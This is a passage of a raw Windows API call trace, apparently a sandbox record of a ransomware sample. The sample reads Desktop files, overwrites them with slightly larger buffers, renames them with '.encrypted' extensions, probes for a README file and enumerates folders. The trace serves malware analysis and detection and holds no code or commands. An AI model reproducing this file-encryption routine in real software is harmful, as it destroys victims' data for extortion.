[0153.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrolq7t3du67wcp mup.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.720] GetFileType (hFile=0x4d0) returned 0x1 [0153.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.721] GetFileType (hFile=0x4d0) returned 0x1 [0153.721] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1646f [0153.721] ReadFile (in: hFile=0x4d0, lpBuffer=0x40552a8, nNumberOfBytesToRead=0x1646f, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x40552a8*, lpNumberOfBytesRead=0x2ee894*=0x1646f, lpOverlapped=0x0) returned 1 [0153.724] CloseHandle (hObject=0x4d0) returned 1 [0153.741] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.742] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", lpFilePart=0x0) returned 0x3d [0153.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrolq7t3du67wcp mup.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.743] GetFileType (hFile=0x4d0) returned 0x1 [0153.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.743] GetFileType (hFile=0x4d0) returned 0x1 [0153.743] WriteFile (in: hFile=0x4d0, lpBuffer=0x40c4918*, nNumberOfBytesToWrite=0x16470, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x40c4918*, lpNumberOfBytesWritten=0x2ee884*=0x16470, lpOverlapped=0x0) returned 1 [0153.745] CloseHandle (hObject=0x4d0) returned 1 [0153.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi", lpFilePart=0x0) returned 0x3d [0153.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi.encrypted", lpFilePart=0x0) returned 0x47 [0153.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrolq7t3du67wcp mup.avi"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bca7090, ftCreationTime.dwHighDateTime=0x1d5da45, ftLastAccessTime.dwLowDateTime=0xb9bdd820, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x429c1340, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x16470)) returned 1 [0153.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.747] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrolq7t3du67wcp mup.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XROLQ7T3Du67WCP mup.avi.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xrolq7t3du67wcp mup.avi.encrypted")) returned 1 [0153.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", lpFilePart=0x0) returned 0x35 [0153.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_dgvp9qaeim.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.749] GetFileType (hFile=0x4d0) returned 0x1 [0153.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.749] GetFileType (hFile=0x4d0) returned 0x1 [0153.749] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xcadc [0153.749] ReadFile (in: hFile=0x4d0, lpBuffer=0x231c780, nNumberOfBytesToRead=0xcadc, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x231c780*, lpNumberOfBytesRead=0x2ee894*=0xcadc, lpOverlapped=0x0) returned 1 [0153.751] CloseHandle (hObject=0x4d0) returned 1 [0153.771] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0153.772] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0153.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", lpFilePart=0x0) returned 0x35 [0153.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0153.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_dgvp9qaeim.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.774] GetFileType (hFile=0x4d0) returned 0x1 [0153.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0153.774] GetFileType (hFile=0x4d0) returned 0x1 [0153.774] WriteFile (in: hFile=0x4d0, lpBuffer=0x238f5e0*, nNumberOfBytesToWrite=0xcae0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x238f5e0*, lpNumberOfBytesWritten=0x2ee884*=0xcae0, lpOverlapped=0x0) returned 1 [0153.776] CloseHandle (hObject=0x4d0) returned 1 [0153.778] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp", lpFilePart=0x0) returned 0x35 [0153.778] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp.encrypted", lpFilePart=0x0) returned 0x3f [0153.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0153.778] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_dgvp9qaeim.bmp"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58777950, ftCreationTime.dwHighDateTime=0x1d5e009, ftLastAccessTime.dwLowDateTime=0xebb5ff70, ftLastAccessTime.dwHighDateTime=0x1d5dafa, ftLastWriteTime.dwLowDateTime=0x42a0d600, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xcae0)) returned 1 [0153.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0153.779] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_dgvp9qaeim.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_DGVP9QaEiM.bmp.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_dgvp9qaeim.bmp.encrypted")) returned 1 [0153.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.781] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub", lpFilePart=0x0) returned 0x31 [0153.781] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\", lpFilePart=0x0) returned 0x32 [0153.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee330 [0153.784] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.784] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a844fb0, ftCreationTime.dwHighDateTime=0x1d5e665, ftLastAccessTime.dwLowDateTime=0x36a89f40, ftLastAccessTime.dwHighDateTime=0x1d5da35, ftLastWriteTime.dwLowDateTime=0x36a89f40, ftLastWriteTime.dwHighDateTime=0x1d5da35, nFileSizeHigh=0x0, nFileSizeLow=0x12732, dwReserved0=0x0, dwReserved1=0x0, cFileName="b4JR7cQGa6.gif", cAlternateFileName="B4JR7C~1.GIF")) returned 1 [0153.784] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4ijCytc3cL6KrfK5", cAlternateFileName="F4IJCY~1")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90103ca0, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x64e46200, ftLastAccessTime.dwHighDateTime=0x1d5df34, ftLastWriteTime.dwLowDateTime=0x64e46200, ftLastWriteTime.dwHighDateTime=0x1d5df34, nFileSizeHigh=0x0, nFileSizeLow=0x16497, dwReserved0=0x0, dwReserved1=0x0, cFileName="lC0nzIclr0n.csv", cAlternateFileName="LC0NZI~1.CSV")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ccd9ff0, ftCreationTime.dwHighDateTime=0x1d5da7e, ftLastAccessTime.dwLowDateTime=0x65bbe1a0, ftLastAccessTime.dwHighDateTime=0x1d5d7b2, ftLastWriteTime.dwLowDateTime=0x65bbe1a0, ftLastWriteTime.dwHighDateTime=0x1d5d7b2, nFileSizeHigh=0x0, nFileSizeLow=0xa1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="xCg2yAxkU2C8AtVq5.jpg", cAlternateFileName="XCG2YA~1.JPG")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7686a550, ftCreationTime.dwHighDateTime=0x1d5e677, ftLastAccessTime.dwLowDateTime=0x98613e70, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x98613e70, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0x17f3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="y9h9zrThfAP.avi", cAlternateFileName="Y9H9ZR~1.AVI")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4451210, ftCreationTime.dwHighDateTime=0x1d5e40c, ftLastAccessTime.dwLowDateTime=0x2ecfd650, ftLastAccessTime.dwHighDateTime=0x1d5ddcb, ftLastWriteTime.dwLowDateTime=0x2ecfd650, ftLastWriteTime.dwHighDateTime=0x1d5ddcb, nFileSizeHigh=0x0, nFileSizeLow=0x1424d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ye6NLXYVra7xela.bmp", cAlternateFileName="YE6NLX~1.BMP")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_RQ9Gu", cAlternateFileName="")) returned 1 [0153.785] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_RQ9Gu", cAlternateFileName="")) returned 0 [0153.786] FindClose (in: hFindFile=0x94ee330 | out: hFindFile=0x94ee330) returned 1 [0153.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub", lpFilePart=0x0) returned 0x31 [0153.787] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\", lpFilePart=0x0) returned 0x32 [0153.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee330 [0153.788] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92501b30, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0xc75f45b0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xc75f45b0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.788] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a844fb0, ftCreationTime.dwHighDateTime=0x1d5e665, ftLastAccessTime.dwLowDateTime=0x36a89f40, ftLastAccessTime.dwHighDateTime=0x1d5da35, ftLastWriteTime.dwLowDateTime=0x36a89f40, ftLastWriteTime.dwHighDateTime=0x1d5da35, nFileSizeHigh=0x0, nFileSizeLow=0x12732, dwReserved0=0x0, dwReserved1=0x0, cFileName="b4JR7cQGa6.gif", cAlternateFileName="B4JR7C~1.GIF")) returned 1 [0153.788] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf60d0be0, ftCreationTime.dwHighDateTime=0x1d5e2f6, ftLastAccessTime.dwLowDateTime=0xe1268c60, ftLastAccessTime.dwHighDateTime=0x1d5e4ae, ftLastWriteTime.dwLowDateTime=0xe1268c60, ftLastWriteTime.dwHighDateTime=0x1d5e4ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4ijCytc3cL6KrfK5", cAlternateFileName="F4IJCY~1")) returned 1 [0153.789] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90103ca0, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0x64e46200, ftLastAccessTime.dwHighDateTime=0x1d5df34, ftLastWriteTime.dwLowDateTime=0x64e46200, ftLastWriteTime.dwHighDateTime=0x1d5df34, nFileSizeHigh=0x0, nFileSizeLow=0x16497, dwReserved0=0x0, dwReserved1=0x0, cFileName="lC0nzIclr0n.csv", cAlternateFileName="LC0NZI~1.CSV")) returned 1 [0153.789] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ccd9ff0, ftCreationTime.dwHighDateTime=0x1d5da7e, ftLastAccessTime.dwLowDateTime=0x65bbe1a0, ftLastAccessTime.dwHighDateTime=0x1d5d7b2, ftLastWriteTime.dwLowDateTime=0x65bbe1a0, ftLastWriteTime.dwHighDateTime=0x1d5d7b2, nFileSizeHigh=0x0, nFileSizeLow=0xa1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="xCg2yAxkU2C8AtVq5.jpg", cAlternateFileName="XCG2YA~1.JPG")) returned 1 [0153.789] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7686a550, ftCreationTime.dwHighDateTime=0x1d5e677, ftLastAccessTime.dwLowDateTime=0x98613e70, ftLastAccessTime.dwHighDateTime=0x1d5e464, ftLastWriteTime.dwLowDateTime=0x98613e70, ftLastWriteTime.dwHighDateTime=0x1d5e464, nFileSizeHigh=0x0, nFileSizeLow=0x17f3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="y9h9zrThfAP.avi", cAlternateFileName="Y9H9ZR~1.AVI")) returned 1 [0153.789] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4451210, ftCreationTime.dwHighDateTime=0x1d5e40c, ftLastAccessTime.dwLowDateTime=0x2ecfd650, ftLastAccessTime.dwHighDateTime=0x1d5ddcb, ftLastWriteTime.dwLowDateTime=0x2ecfd650, ftLastWriteTime.dwHighDateTime=0x1d5ddcb, nFileSizeHigh=0x0, nFileSizeLow=0x1424d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ye6NLXYVra7xela.bmp", cAlternateFileName="YE6NLX~1.BMP")) returned 1 [0153.790] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1881900, ftCreationTime.dwHighDateTime=0x1d5e0fa, ftLastAccessTime.dwLowDateTime=0xa89c79b0, ftLastAccessTime.dwHighDateTime=0x1d5e43e, ftLastWriteTime.dwLowDateTime=0xa89c79b0, ftLastWriteTime.dwHighDateTime=0x1d5e43e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_RQ9Gu", cAlternateFileName="")) returned 1 [0153.790] FindNextFileW (in: hFindFile=0x94ee330, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.790] FindClose (in: hFindFile=0x94ee330 | out: hFindFile=0x94ee330) returned 1 [0153.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", nBufferLength=0x105, lpBuffer=0x2ee2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv", lpFilePart=0x0) returned 0x41 [0153.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0153.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V9T82XygGub\\lC0nzIclr0n.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v9t82xyggub\\lc0nziclr0n.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.793] GetFileType (hFile=0x4d0) returned 0x1 [0153.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0153.793] GetFileType (hFile=0x4d0) returned 0x1 [0153.793] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8a8 | out: lpFileSizeHigh=0x2ee8a8*=0x0) returned 0x16497 [0153.794] ReadFile (in: hFile=0x4d0, lpBuffer=0x40f4368, nNumberOfBytesToRead=0x16497, lpNumberOfBytesRead=0x2ee854, lpOverlapped=0x0 | out: lpBuffer=0x40f4368*, lpNumberOfBytesRead=0x2ee854*=0x16497, 